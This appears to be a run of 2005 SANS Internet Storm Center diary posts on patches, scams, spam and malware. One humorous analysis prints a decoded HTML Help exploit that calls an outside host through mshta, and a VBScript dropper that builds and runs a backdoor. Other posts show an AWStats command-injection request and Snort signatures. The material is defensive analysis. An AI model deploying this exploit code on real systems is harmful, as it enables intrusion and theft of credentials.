Misc. Items
- Thanks for all the feedback on my spyware report.
- ISC Handler Pedro Bueno has put up the answers to his malware analysis quiz and posted a new quiz on his handler webpage. Check it out.
Snort 2.4.2 Released
* Fixed crash bug with -T and default logging setup first reported by
Zultan.
* Corrected Win32 directory setup for new WinPCAP.
0 Comments
Over $24 billion Dollars at Risk of Theft from Spyware in US Alone
This is my own estimate and you can look at the methodology here. Essentially I took the infection rate of "system monitor" spyware infections (those that have keyloggers which grab banking account and credit card information), the percentage of people who bank and shop online, and the average balance on bank accounts and credit cards and came up with over $24 billion in assets and credit that can be levereged by "hostile entities" today. I believe this number is an underestimate. This does not include accounts stolen via phishing, online merchants who just take the information you give them, or other social engineering attacks.
This is a draft analysis (complete with typos, bad grammar, and probably broken HTML) and comments are welcome to bambenek -at- gmail.com.
0 Comments
More on Outlook Anti-Phishing Feature
Also as mentioned here:
http://blogs.washingtonpost.com/securityfix/2005/09/microsoft_issue.html
The Outlook update listed in the New Microsoft Updates ISC story adds a new feature by default which is highlighted here:
Thanks to fellow handler Lenny Zeltser for testing and the screenshot.
Still waiting on detail specifics and test results.....
      
0 Comments
New Microsoft Updates
Here's a blurb and some links in case you missed it.
Microsoft Office 2003 SP2 Released
http://support.microsoft.com/kb/887616
Security bulletins that are associated with the service pack
MS05-023/KB890169: Vulnerabilities in Microsoft Word could lead to remote code execution
MS04-027/KB884933: Vulnerability in WordPerfect converter could allow code execution
MS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code execution
Microsoft Visio 2003 SP2 Released
http://support.microsoft.com/kb/887616
Security bulletins that are associated with the service pack
MS04-028/KB833987: Buffer overrun in JPEG processing (GDI+) could allow code execution
http://support.microsoft.com/kb/904631
This update should improve your junk mail filtering accuracy.
0 Comments
Potential New AOL Chait Virus
Details are sketchy so far but we have the following thanks to Alan and Chris.
McAfee deletes the viruses but every time the user logs of and back onto the system it regenerates the batch file.
User gets a chat via AOL
"Checkout this JPEG" with a link
After clicking the link it sends to everyone on their buddy list and creates the file
C:\xz.bat
Contents of the file: it is set to disable MS security, firewall
Creates 3 registry entries one of which is a service
Hkey_local_machine\Software\Microsoft\Windows\Current Version\Run
Name :Strtax Data: lock.exe (Delete)
Hkey_local_machine\Software\Microsoft\Windows\Current Version\Run Services
Name :Strtax Data: lock.exe (Delete)
Hkey_User\Software\Microsoft\Windows\Current Version\Run Services
Name :Strtax Data: lock.exe (Delete)
After deleting those three keys and a reboot the xz.bat file stopped trying to reload itself.
If you have a copy of xz.bat or lock.exe please submit it by using the contact form at http://isc.sans.org/contact.php
0 Comments
Errata, Mea Culpa, "latest" "Date released" and "Date Published"
"Release date" and "Date Published" and "latest" as used by MS on their "Download Center" and as a result of going through their "Microsoft Download Notifications" email service are useless in determining currency. Take the additional steps and check the digital signature dates and research some more and you'll know if they're needed in your environment.
Reader clue Submission;
We had some posts pointing out that these were not "new" items, one submission (they requested anonymity) said it best;
"1. the ie6sp1 for non-xp sp2 systems that you say it is new..the file date&time it may well be, but the digital signature date for the file that i downloaded from that link says it was signed on May 3rd 2004 !!! so its an old one.
Maybe the file date was modified on the download server, but the says otherwise.
2. same with the dx8 file.. this one is even older
the digital signature says it was created on August 8th 2003, even older!
please check the digital signatures in the future before posting announcements."
Thank you "anonymous", next time I'll be sure to remember that.
Exculpatory information
The Microsoft's Download Center's "Release Date" for the Diary items said;
"Internet Explorer 6 Service Pack 1 Release date 9/21/2005" and "Security Fix for DirectX 8 (KB819696) Release date 9/22/2005".
When you click the download link for the details of each Download Center item, the download "Date Published" information says;
"Internet Explorer 6 Service Pack 1 Date Published: 9/22/2005" and goes on to say:
"Quick Description:
Internet Explorer 6 is the set of core Web browsing technologies in Windows XP. These core technologies have recently been updated as part of Windows XP Service Pack 2 (SP2) with Advanced Security Technologies". And I assumed (I know ....) that MS had updated IE running on XPSP1 with IEXPSP2 security technology.... No other clueful information there.
Moving on, the "Security Fix for DirectX 8 on Windows 2000, Windows ME, Windows 98 SE, and Windows 98 (KB819696)" says "Date Published: 9/22/2005". Again, there's no other clueful information there.
On "Latest" and Published"
In addition, when you receive the "Microsoft Download Notifications" email service (in this case September 23, 2005") and click it's links for the "latest" you get the same date items as above. The "Notifications" email is "a free weekly mailing that provides you with the latest drivers, trial software, service packs, and other downloads from the Microsoft Download Center. Listed below are downloads published in the Download Center in the past week, in the categories that you have chosen*".
In summary "Date released", "Date Published" and "latest" have nothing to do with currency.
I did contact MS about this but I'm having problems understanding where to go from here. Encyclopedia? Susan Bradley, ( ; ^ ) Susan!
Other;
"Release date" use;
"Earnings Release Date Set"
http://moneycentral.msn.com/investor/alerts/glossary.asp?TermID=2
"Date Published"
http://www.cgpublisher.com/CGOntology/CGDatePublished
Patrick Nolan ( ; ^ )
0 Comments
Possible New Zero-Day Exploit for Realplayer
Helix Player 1.0.5 Gold and prior (Linux)
RealPlayer 10.0.5 Gold and prior (Linux)
There is no known fix at this time. http://service.real.com/help/faq/security/ has not posted information on this yet.
Blake Hartstein from demarc.com posted the following to Bleeding-Snort yesterday which should provideStay tuned for further updates as we have them.
coverage for this issue:alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any
(msg:"BLEEDING-EDGE RealPlayer/Helix Player Format String Exploit";
flow:established,from_server; content:"<image\s+[^>]* 
pcre:"/handle=[^>]*%[^>]*%/iG"; 
reference:url,milw0rm.com/id.php?id=1232; reference:bugtraq,14945; )
0 Comments
New Handler Pages Are Here!
0 Comments
AWSTATS
GET //awstats.pl?configdir=|echo
Also, see the diary by fellow handler Erik Fichtner dated August 29, 2005 for more on this.
0 Comments
'Pump and Dump' Spam Messages
Just a quick note for everyone as you return to the office on Monday morning. There have been a few reports of a new spam message that has been getting thrown out on the net over the weekend that will have security implications for some. `Pump and Dump' spam messages are email messages that appear to give the reader an insiders edge to a particular stock that will have some amazing growth. The people involved in this spam have undoubtedly bought many shares of the stock ahead of time and will dump them after unsuspecting users push the stock price up with their purchases. This type of spam has been around for a while, and usually doesn't make it to my inbox that often. However, since Saturday morning I have had upwards of 100 reach one of my older email addresses, and many more have been sent in to the postmaster and abuse addresses.
However, upon looking closely at the headers and looking at a very high end view, this appears to be related to exploitation of some type of cgi or php application. After exploitation, the attacker can proxy, or otherwise relay their junk mail. Unfortunately, I have not been able to get close enough to one of these relay machines to determine precisely what application has come under fire.
So, if you find that your company has had a large uptick in `pump and dump' spams, know that you are not the only ones. If you find webserver logs, or better yet, an actual compromised host that was sending out this junk, then please let us know what application it is that is being exploited.
[Update - 20050926 - 2000 UTC]Â --
There are several theories about what is how the spam was being sent out. Most of them revolve around the concept of a set of zombies that were targeted at a set of domains and email addresses. How exactly, we still don't know and hope that one of the domains that actually was exploited will look through their logs or other audit sources to help shed light on this.
With that said, there is a very interesting graph that involves the stock of the company being spammed about. Take a look at Yahoo Finance Website for TOTG  The company in the past several days has had very small volume and little fluxuation in their prices. If you look at the historical records it shows this as well, with the exception of Septermber 12th. 1.2 Million in shares exchanging hands which is what pumped the stock out of the ~40-60 cent range to the dollar range. For future viewers, i am saving

Judging by what I am seeing, it appears that there are a lot of greedy people out there who are willing to listen to "insider information" sent to them in spam. NOTE: I am not saying that anything about the 2-Track Global corporation. It is my opinion that until someone is found to do something fraudulent within their company, that they are a bunch of good guys and have become the victims of this activity. I have forwarded copies of some of the emails to the SEC for their follow-up, and I hope that they are able to follow the money to the real criminal(s).
Scott Fendley
ISC Handler
0 Comments
IE 6 SP1 and Direct X downloads
There are two new downloads from Microsoft with publish dates of last week.
The first is Internet Explorer 6 SP1, for systems that are not XP SP2. Not a lot of detail or documentation available on this yet. It shows a publish date of 21 Sept 2005.
http://www.microsoft.com/downloads/details.aspx?FamilyID=1e1550cb-5e5d-48f5-b02b-20b602228de6&DisplayLang=en
The second is an update Security Fix for DirectX 8 on Windows 2000, Windows ME, Windows 98 SE, and Windows 98. The KB article does not appear to have been updated, but the download has a publish date of 22 Sept 2005. The original advisory was MS03-030.
http://www.microsoft.com/downloads/details.aspx?FamilyID=49552d6a-4a62-48ba-a2ac-0b237cd5f732&DisplayLang=en
Cheers,
Adrien
SANS Internet Storm Center Handler of the day
0 Comments
Zen approach to backups
Now I am no expert on zen. I don't know anyone who is, and I don't play a zen master on TV. I do have some experience with data backups, and quite a bit attempting to do restores. Note the key word attempt. A number of times I have asked clients for their most recent backup tapes, only to realize that they are blank, too old, the tapes are damaged, the tapes are 30 KM away, or they did not back up the data they intended to.
What is zen anyway? One way to think of zen is that it is an approach to the journey of life. You become more aware of the journey as it happens, as well as the things and people around you. Zen is about those things that are within you, and interacting with your environment.
So how does zen have anything to do with data backups? Backups are one of those things we really know we should do. I have often said that there are only three rules to using computers. The first is to plan on doing backups. The second is actually doing the backups, and the third is to test those pesky backups to make sure they actually worked. It is funny that number three is the step we seem to miss out on the most. Not to pick on the number three, it should not feel left out, almost as many people fail to do number one or number two.
One of the interesting things about data is that it is actually constantly moving. It doesn't just lie there, you can only take snapshots in time. A good analogy is that data can be like water. The picture of how it looks at one point might not relate at all to how it looks later. You can take great care to contain the water, but it can also go stale, or the storage container can go bad as well. Having multiple copies of the data doesn't guarantee that they are the same at all. In approaching zen backup guru-hood you are unfortunately only as good as the last known good backup that you can restore.
What is data? Well one way of looking at it is all that stuff you would rather not lose. All that stuff that should be backed up, that is your data grasshopper. One of the funny (well not really) things about data is the more of it you have lost over time, the better you get at backups! You can learn wisdom through data loss grasshopper.
Lets face it, working with computers can be interesting, fun, infuriating, frustrating, and educational. All at the same time. No matter how you feel about them, most of us keep rather important stuff on our computers. Think carefully and approach awareness of the value of the data on computers, both those at home and those at work. Realize the tragedy of complete loss of that data, let it permeate your being. Sense the power of a proper tested backup, the joy of being able to restore that data. Meditate and happily hum along with your favorite backup software and hardware. Place you backup media with reverence in its place of safety.
If you fail in these steps along the path to zen backups, have no worry. Really, was the data truly yours to begin with? If there is no sign of that data, who is to say it existed in the first place?
A reader mentioned that this story reminded him of a site he read a while back:
http://taobackup.com/
(Thanks Dan!)
Cheers,
Adrien de Beaupré
Handler of the day
http://www.cinnabar.ca/
0 Comments
No more Bagel, Bagle, Beagle
I knew this was coming but did not realize they were this close to implementation.
US-CERT, the U.S. Computer Emergency Readiness Team, will begin issuing uniform names for computer viruses, worms and other malicious code next month, as part of a program called the Common Malware Enumeration initiative.
http://www.eweek.com/article2/0,1895,1862266,00.asp
To malware fighters, researchers, and many others this will be a very good thing.
There will be some issues but it will make my job easier.
0 Comments
Patch Mozilla ASAP
http://www.informationweek.com/story/showArticle.jhtml?articleID=171200310
0 Comments
Cisco IOS Firewall vulnerability update.
http://www.cisco.com/en/US/products/products_security_advisory09186a00805117cb.shtml#software
Revision 1.1
2005-September-22
Added 12.2SG, 12.2SEC, and 12.2SXF releases to Software Version and Fixes
0 Comments
FinCen quicknews hacked
The “FinCEN QuikNews” system, a subscriber-based e-mail service that is part of the Financial Crimes Enforcement Network’s public website and is hosted externally, appears to have been compromised this morning. We are investigating this incident. This system resides outside FinCEN’s security perimeter and is not connected to any other FinCEN systems. Bank Secrecy Act data, and all other sensitive information maintained by FinCEN, was in no way, shape or form compromised by this incident.
To read the rest goto http://www.fincen.gov/quiknews_statement.pdf
0 Comments
New Handler: Mohammed Haron
Mohammed is currently working for Intel Corp. in Penang, Malaysia. His duties at Intel include a wide array of security responsibilities from IDS to Forensics. He holds a GIAC GSEC and GCIA certification, and has been a local mentor for both.
His interest in security got jump-started by a group of Brazilian hackers defacing his perosnal web site (gr33tz to P3dr0).
0 Comments
Winners of Bonus Points from Yesterday’s FTBM
Yesterday, Tom Liston posted his latest Follow the Bouncing Malware. In it, he posed a question for extra credit, namely:
"Those of  you with taped, horn-rimmed glasses who were in the AV club in Jr. High will  note that the numbers assigned to o(0) look strangely familiar.  [They  were 4d5a] They're the hex equivalents of the "magic values" that  begin every program on the PC (extra-credit: anyone know what they stand  for?)."
We had several readers point out the answer, but the first  was Frank Knobbe:
  "Actually, it is every MSDOS program. Every Portable Executable (PE) file  starts with a header. The first two bytes is a 'magic' that  identifies the file as an MSDOS executable. The magic is 0x5A4D which is MZ in  ASCII. MZ are the initials of Mark Zbikowski, one of the original architects of  MS-DOS. :)"
Tom described this as the ultimate in vanity-license-plate equivalents for geeks. Indeed it is. And, I might point out that the file encryption solution built into modern Windows systems is called….
Signing out—
Edward Frank Skoudis
Intelguardians, www.intelguardians.com
0 Comments
Speaking of Said Upgrades… Firefox 1.0.7
The latest version of Firefox is available, including some important security fixes. Get it here. This one fixes a few big security issues, including MFSA 2005-57, IDN heap overrun using soft-hyphens.
0 Comments
Korean Mozilla and Thunderbird Distro Site Woes
Update: According to information we've received (thanks, Roel!), Korean versions of Mozilla and Thunderbird distributed through **official** Mozilla FTP sites were also infected. So, if you use Korean Mozilla or Thunderbird, and downloaded the latest versions of thunderbird or mozilla, you may have been compromised. I suggest a good file integrity check, and perhaps a reinstall of your operating system and apps. Thanks again, Roel, for the clarification.
0 Comments
Wi-Fi Worm Rumors
0 Comments
Hurricane Katrina Follow-UP
Got this message from some fine folks at DHS:
"In responding to recent natural disasters and state of  emergencies due to Hurricane Katrina, and now Rita, the DHS US-CERT in  collaboration with the Control Systems Security Center (CSSC) has released a  Hurricane Katrina Control System Assistance Informational Paper. The US CERT  Control Systems Security Center (CSSC) has placed this informational bulletin here.  Please go to this site and click on the link  under reports for "Hurricane Katrina Control Systems Assistance (PDF)."
This paper describes how to get physical and electronic operations back on-line in a time of crisis.
0 Comments
Hurricane Rita Scams ALREADY!
Sadly, Hurricane Rita charity scams have already  started.  Several handlers at the ISC, including Tom Liston and Johannes Ullrich, are working with others, such as US-CERT, on coming up with lists of scam  sites.  
Watch the diary over the next few days for such a list. Also, if you find a bogus-looking "charity", feel free to report it to us at handlers-rita@sans.org or to US-CERT at soc@us-cert.gov.
Also, you may want to check out our collaborative reporting system to help sort out bogus sites posing as hurricane charities.
Update 
Due to an initiative born from the 'mwp' list, a number of domain name  registrars, anti-phishing, anti-spam groups and national CERTS are  working together to have these sites closed down as fast as possible.
The RedCross  has set up a special email address for reporting suspicious sites fraudalert@usa.redcross.org
Also, here is a current list of the RedCross's official   donation sites:
http://www.redcross.org/sponsors/donationsites/official_donation_sites.html
You can of course just go to
http://www.redcross.org as the starting page if you wish to   give to the
American Red Cross. That is probably the safest method.
0 Comments
Follow the Bouncing Malware IX: eGOLDFINGER
The Spy Who Bugged Me
Cigarette smoke hung around the lampshade like a bad memory and the watery light from the low wattage bulb made the cheap coffeehouse tabletop look somehow cheaper. It was late afternoon and, as I relaxed back into the leather of the booth's seat and took a long, slow draw on my double-mocha latte with extra whipped cream, I gave the little barista hottie my most smoldering "come hither" look. No one was more surprised than me when she actually came hither."Look, Mister," she began, snapping her gum seductively; "you can't just sit here all afternoon nursing one lousy cup of coffee. You have to buy something."
She wanted me. It was obvious.
And why not? All women want me, for I am Sixpack... Joe Sixpack, Agent 008.
[Insert long, surreal opening credit sequence, with scantily clad models prancing about to '60s music, while seductively caressing handguns.]
[Nope... nothin' Freudian about that...]
Careful not to blow my cover story (a middle-aged, balding, overweight insurance salesman on a junket to the home-office in Duluth, MN for training) I dialed back on "suave and debonair" to better fit the part:
"Uh... Look, uh... I'm from out of town and my wife only gave me so much money to spend each day... and she'll be really mad if I..."
"Buy something or get out. You can't just come in here and sit at our tables and use the free wireless all afternoon. You have to buy something."
"Look, this isn't even my laptop. I borrowed it from my boss. He told me that I..."
"Are you going to buy something, or do I have to call the cops?"
"Ok. Fine. I'll order something. What's the cheapest thing you sell?"
Both the way she rolls her eyes, and her long, drawn-out sigh scream "I want you." She can barely contain herself as she takes my order for a kid-sized fruit punch. I sense a shiver of ecstasy run through her body when, as she is walking back to the counter, I add "Shaken, not stirred."
I return my attention to the matter at hand. The evil minions of SPECTRE have hidden several explosive devices within a grid conveniently displayed on the "borrowed" laptop's screen. It is my mission to find out where they are and mark them. It is a delicate task, but Joe Sixpack, Agent 008, is up to the challenge.
Just as I was poised to place a flag marking the position of another of the explosive devices, a small voice speaks to me.
Every secret agent counted on that small, still voice inside to warn them when something wasn't right... when danger lurked nearby. But this wasn't that voice. This was an inane, stupidly-chipper voice that said "You've got mail!" in a tone normally reserved for saying things like "You've won a Nobel Prize."
"Hey, Mr. Trump, you've got mail," said the sultry coffee-serving wench, undressing me with her eyes as she placed my cup of DomJuicyJuice on the table next to me. "I don't suppose you'll be ordering anything else..."
"Only later tonight, when I have you in my bed," I think to myself while quickly saying "No."
At the bottom of the screen, in the System Tray, there is a little red envelope flashing at me: obviously, a new, Top Secret, Eyes-Only message. I glance around, acting, for all who might be watching, exactly like some guy who was about to open the email program that his boss accidentally left running on his borrowed laptop.
The place is empty, except for me and my hunka-hunka-burnin' barista love, but you can never be too careful. A double-click on the envelope brings up the Ultra Top Secret Messaging Interface, cleverly disguised as an outdated version of Outlook Express.
At the top of the screen, I see the new message. In bold, the subject reads: "Notification of e-gold account update."
I clear my throat, a few dozen times, and casually say "Yep... those e-gold folks. What a pain they are... constantly after me about updating my account information. It just never ends..."
Obviously left speechless in the presence of such a worldly yet attractive member of the opposite sex, my scalding-hot coffee-girl can only make a loud, yet feminine, snorting noise.
"I thought you said that the laptop belonged to your boss."
"Did I? Uh... no. No. It's mine. All mine. One of several that I own, in fact," I stammer. As if to prove my point, I double-click on the email, opening it.
The email itself is pretty much of a disappointment-no text, no nothing. It was probably just some sort of mistake. For a moment, I think I see some strange flashing of windows, but I'm suddenly distracted as my Caffeine-Queen speaks:
"Why did you say that?" she asks.
"Say what?"
"You know... the stuff about e-gold and owning a bunch of laptops. Why did you say that? Are you trying to impress me or something? Do you think that you can walk your bland chubby middle-aged self in here, order the cheapest thing on the menu so you can use our wireless, and then toss out some bull about owning gold and laptops and impress me?"
"I was only trying to make conversation..." I explain.
"Well don't," she says, looking suddenly like some evil arch-villain. "I don't expect you to talk, Mr. Bland... I expect you to buy."
From Russia With Love
While Agent 008 might have thought the email that he opened was a "disappointment," like any good spy thriller, there was a lot more going on behind the scenes. While there wasn't any text to the email, it did deliver a top secret message.Hidden within the email was the following JavaScript:
<html><script>var a=' <edited>';
var e=256,x=0,o="",t=new Array(4113),s="Ñ<style>#Ñx2<edited>";
function g(s,f){if(s.length<=x)return e;
else{if(f){return s.charAt(x++);}else{return a.indexOf(s.charAt(x++));
}}}function d(){var i,j,k,c,r=4078,l=0,os="",ar,ic=0;ar=new Array();
for(i=0;i<4078;i++)t[i]=" ";for(;;){if(((l>>=1)&256)==0)
{if((c=g(s,0))==e)break;l=c|65280;}if(l&1){if((c=g(s,1))==e)break;
os+=c;t[r++]=c;r&=4095;}else{if((i=g(s,0))==e)break;
if((j=g(s,0))==e)break;i|=((j&240)<<4);j=(j&15)+2;
for(k=0;k<=j;k++){c=t[(i+k)&4095];os+=c;t[r++]=c;r&=4095;}}
if(os.length>80){ar[ic++]=os;os="";}}o=ar.join("")+os;}d();
document.writeln(o);document.close();
</script></head><body
onLoad='window.status="<edited> ."'>
</body></html>
Note: several of the character strings have been <edited> as indicated.
Several FTBMs ago, kindly ol' doctor Tom told you how to deal with encoded JavaScript like this. I showed you a very Zen-like technique that used the script itself to do the decoding for you. Well... forget it. I now have an even easier way to show you, so sit back and take notes as Dr. Tom shows you how to mess up a malware author's day.
Doctor! No!
The technique I described before used a FileSystemObject to create a text file that contained the dumped output of the obfuscated JavaScript. Doing that was rather a pain, required that you edit the JavaScript in several places and... well, let's just stick with "it was a pain." Here's a much easier way.Look through the JavaScript and find where it is that they're actually dumping the results of their decoding function back into the document. It'll most likely be a call to either document.write() or document.writeln(). What is happening is that the JavaScript is actually writing the new, decoded HTML / JavaScript back into the live document so it can be interpreted by your browser's parser on the fly. What we want to do is find a way to short-circuit that parsing and allow the results to be displayed rather than interpreted by the browser. The easiest way to do that is to have the decoded output displayed by an HTML construct called a <textarea>.
In the above code, this can be accomplished by putting the following before the call to document.writeln(o):
document.write("<textarea cols=100 rows=100>");
and the following immediately after:
document.write("</textarea>");
You then fire off the resulting JavaScript in a browser, and it will display the code that it would've normally interpreted. And just-like-that, someone's hard work to obfuscate their code falls apart.
Note: Never, ever, ever ,ever, do this on a "live" production machine. Only ever play with malware on an isolated lab machine that you're ready, willing, and able to reformat at the drop of a hat. Remember: if you mess up, I'll send sharks with frickin' laser beams on their heads over to get you.
Doing that, we find that the obfuscated stuff is actually:
<style>#x2,#x3{position:absolute;left:-1000;}</style>
<OBJECT id=x2 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<param name="Scrollbars" value="true">
<PARAM NAME="Item1"
VALUE="command;ms-its:icwdial.chm::/icw_overview.htm">
</OBJECT>
<script>x2.HHClick();</script>
<OBJECT id=x3 classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11>
<PARAM NAME="Command" VALUE="Related Topics">
<PARAM NAME="Button" VALUE="Text:">
<PARAM NAME="Window" VALUE="$global_blank">
<PARAM NAME="Item1" VALUE="command;javascript:document.links[0].href='
EXEC=,mshta,http://www.date4me2.com/images/x.hta CHM=ieshared.chm
FILE=app_install.htm'%3Bdocument.links[0].click();">
</OBJECT>
<script>setTimeout('x3.HHClick();',1000);setTimeout('window.close();',1200);
</script>
</html>
This is an exploit aimed at a vulnerability in HTML Help (patched by MS05-001) that can be used to execute arbitrary code. In this case, it attempts to download and launch another HTML file called x.hta.
License To Kill
The file x.hta looks like a very much larger version of the original email message, re-using much of the same code found at the end of the JavaScript, and replacing only the information in the variables. Decoding is done in the same manner as before, and results in the following:<HTML><HEAD>
<TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><NOSCRIPT>To display this page you need a browser with JavaScript support.</NOSCRIPT>
<SCRIPT language="VBScript">
self.MoveTo 6000,6000
Dim IESetup
Dim o(788)
o(0)="4d5a00<edited>"
o(1)="000040<edited>"
.
.
.
783 lines removed...
.
.
.
o(786)="e8564e<edited>"
o(787)="5a6f37<edited>"
set wshProcEnv=MSplay.environment("process")
f=wshProcEnv("TEMP") + "msdtc.exe"
set IESetup=MSmedia.CreateTextFile(f, TRUE)
For j=0 To 787
o_Size=Len(o(j))
For k=1 To (o_Size-1) Step 2
Exe_Byte=Mid(o(j),k,2)
Exe_Byte="&H"+Exe_Byte
IESetup.Write(Chr(Exe_Byte))
Next
Next
IESetup.Close()
MSplay.Run(f),1,TRUE
MSmedia.DeleteFile(f)
self.Close
</SCRIPT>
</BODY></HTML>
Those of you with taped, horn-rimmed glasses who were in the AV club in Jr. High will note that the numbers assigned to o(0) look strangely familiar. They're the hex equivalents of the "magic values" that begin every program on the PC (extra-credit: anyone know what they stand for?).
Yep, the decoded JavaScript is simply building a Win32 executable out of whole cloth... ie. it is simply writing out an executable binary based on hex values stored into an array in the source code. If we remove these lines (which launch and then delete the file...):
MSplay.Run(f),1,TRUE
MSmedia.DeleteFile(f)
and load the HTML in a browser, we end up with the file "msdtc.exe" wherever we have "TEMP" assigned.
The file msdtc.exe is a 50,425 byte long FSG-packed Win32 executable that is chock full o'Evil. (Note: that is evil with a capital "E"). It is recognized, by several antivirus products, as Haxdoor.DW, and categorized as a Trojan/Backdoor.
A View To A Kill
Launching msdtc.exe on a test box results in no visible action (beyond a blinking drive light... hmmm...). Monitoring the action of the software tells us that it installs the following files:C:\WINDOWS\system32\avpx32.dll
C:\WINDOWS\system32\qz.dll
C:\WINDOWS\system32\avpx64.sys
C:\WINDOWS\system32\qz.sys
C:\WINDOWS\system32\avpx32.sys
C:\WINDOWS\system32\qy.sys
C:\WINDOWS\System32\ps.a3d
it also appeared to copy the Windows SAM information to a file called SSL.
The funny thing is, when I went to look for those files on my test machine, they weren't there. Huh, I thought... I *know* that they were created...
Hmmm... a mystery.
The ".sys" ending of some of those files was my first clue. Files with the .sys extension are generally drivers on Windows, and so it would appear that what we have here is (rather than a failure to communicate) a Win32 rootkit-like entity that is hiding the existence of these files.
Sure enough, rebooting the system using a Linux bootable CD, I can see the files sitting in the system32 directory... If I boot normally under Windows, they're "not there."
Cool.
Very, very cool.
(Note: Please don't take that the wrong way. When it comes to the folks who write things like this... their morals go so far beyond "twisted" that perhaps they're "sprained." In spite of that, you have to admit... this is pretty darned cool stuff...)
For Your Eyes Only
In any case, this little bugger has more than a few tricks up its sleeve:It installs itself as two "LegacyDrivers" called "AVPX TCP" (avpx32.sys) and "AVPX64 TCP" (avpx64.sys). From this vantage point, it controls what data system calls (such as those used to enumerate files within the file system and enumerate keys within the registry) will and will not be allowed to return. It hides both the files that it creates and the registry keys that are used to launch and control them. It isn't "directory specific" when it masks files: for instance, if you use notepad to create a file on the desktop called avpx32.dll, the file disappears. Even though the file doesn't show up in a directory listing, trying to create another file with the same name results in a "file exists, replace?" prompt.
It does this by having avpx32.dll injected into essentially every running process.
It turns off memory write protection in the registry, allowing it free reign to overwrite portions of memory and it installs registry values under the HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot key to force itself to run even in Safe Mode.
Yes... you read that correctly: even in Safe Mode.
It sets up a listening process on TCP ports 7080, 8008, and 16661. It does not appear to hide these open ports, or at least it didn't do a very good job of hiding them. With the correct "logon sequence," connections to these backdoor ports will allow a remote "user" to:
Download and execute files
Steal passwords stored in Protected Storage
Steal any cached passwords
Steal dialup connection information
Log keystrokes
If that wasn't Evil enough, it steals information from Internet Explorer's URL in strings that contain: ebay.com, paypal.c and e-gold.c
It also takes the now passé step of blocking access to antivirus vendor websites.
And finally, as if to prove that Evil has no bounds, if you happen to actually *have* an e-gold account (remember, this all started off as an e-gold related spam...) it tries to steal even *more* information about you by logging onto e-gold using the information that it found on your machine.
Somewhere out there, there's a seriously Type-A malware author that should be switching to decaf...
-Tom Liston - Intelguardians Network Intelligence, LLC
0 Comments
s_ta_ts.js, anyone?
If you're curious, you can get your copy off hxxp://othersearch_dot_info/s_ta_ts.js or hxxp://bizfree_dot_org/s_ta_ts.js, but dont complain if you get burnt playing with fire. For the sensibly less curious, the decoded version is shown below, as an image so as not to scare your Antivirus that might nor might not have coverage for this sort of thing.
The file doesn't do much (yet), it invokes Shockwave Flash in an attempt to get a pop-up past the pop-up blocker that most browsers nowadays have. But that's only one half of the story.
The origin of these goodies seem to be pages that have been successfully spammed into various search engines over the past month or so. Users searching, as an example, for completely benign things like "writing business letters" can get a search result that ranks two or three of these fake/spammed pages on top. Clicking on any of the search results then leads the user to the never-never land of pop-ups, and, yes, his/her personal copy of s_ta_ts.js.
In the meantime, we've identified thousands of web pages that only exist with the dual purpose of improving each other's search engine rating (by heavy cross linking) and of course to trick unsuspecting users into clicking themselves to never-never land.
Following up on the DNS domains involved in all these scams, it turns out that all the (pyhsical world) addresses used for registering are completely and obviously bogus and made up. It seems as long as the credit card used to pay for the domain doesn't bounce, it isn't overly important to most registrars if the address is anywhere near legit.
0 Comments
Firefox v1.0.7 Released
From the release notes available at Mozilla Firefox website:
"This version includes several security and stability fixes, including a fix for a reported buffer overflow vulnerability and a fix for a Linux shell command vulnerability.
Specific changes in Firefox 1.0.7
- Fix for a potential buffer overflow vulnerability when loading a hostname with all soft-hyphens
- Fix to prevent URLs passed from external programs from being parsed by the shell (Linux only)
- Fix to prevent a crash when loading a Proxy Auto-Config (PAC) script that uses an "eval" statement
- Fix to restore InstallTrigger.getVersion()for Extension authors
- Other stability and security fixes
0 Comments
Symantec VERITAS Storage Exec DCOM Server BO's
| Affected Product | Version | 
|---|---|
| Build Storage Exec | 5.3 Rev. 2190 | 
| Storage Central | 5.2 Rev. 322 | 
Older versions may be affected as well.
0 Comments
xmlrpc.php - Are you patched?
0 Comments
Important Clam AV Update
0 Comments
New Bagle Making the Rounds?
0 Comments
Updated Twiki Snort Sig
This is an update to a snort sig that we posted earlier for the recently announced TWiki vulnerability that allows for remote code execution:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:\
"BLEEDING-EDGE WEB twiki rev access"; flow:to_server,established; \
uricontent:"/TWikiUsers?"; nocase; pcre:"/rev=\d*[^\d\&\n]/Ui"; \
classtype:web-application-activity; reference:url,secunia.com/\
advisories/16820/; sid:2002366; rev:3;)
Note: This is a single line that has been broken to allow for better formatting in the diary. The "\" characters at the end of the lines above show where the line breaks have been added. Many thanks to Joe Esler, Chas Tomlin, Jason Brvenik, and Frank Knobbe and all the folks from Bleeding Edge (you guys rock!).
0 Comments
How to contribute your data to DShield / ISC
First of all: No submitter is too small. In particular cable modem / DSL user data is frequently the most interesting. We can always use more home users submitting data.
If you are able to submit from a large network, try to pick a few IP addresses and only send data from these IP addresses (e.g. a /24). A simple 'grep' may be all thats needed to filter the data, and our prewritten clients can help you with that.
We are interested in rejected packets from the outermost firewall you have access to. All rejected packets that originate from outside of your network are of interest.
We do accept logs via e-mail. It is recommended that you submit your logs about once an hour, but not less then once a day. We do provide a number of scripts to automated the process.
The best reference to get you started is http://www.dshield.org/howto.php. As a quick summary:
- Windows Users
- Unix Users
- Others
You may also write your own script. Our format is a very simple tab delimited text file. For details, see http://www.dshield.org/specs.php.
We do provide a number of customized analysis features for submitters, which are accessible via DShield.org. For a Demo, see our demo-account.
0 Comments
Notes from the DShield Forum
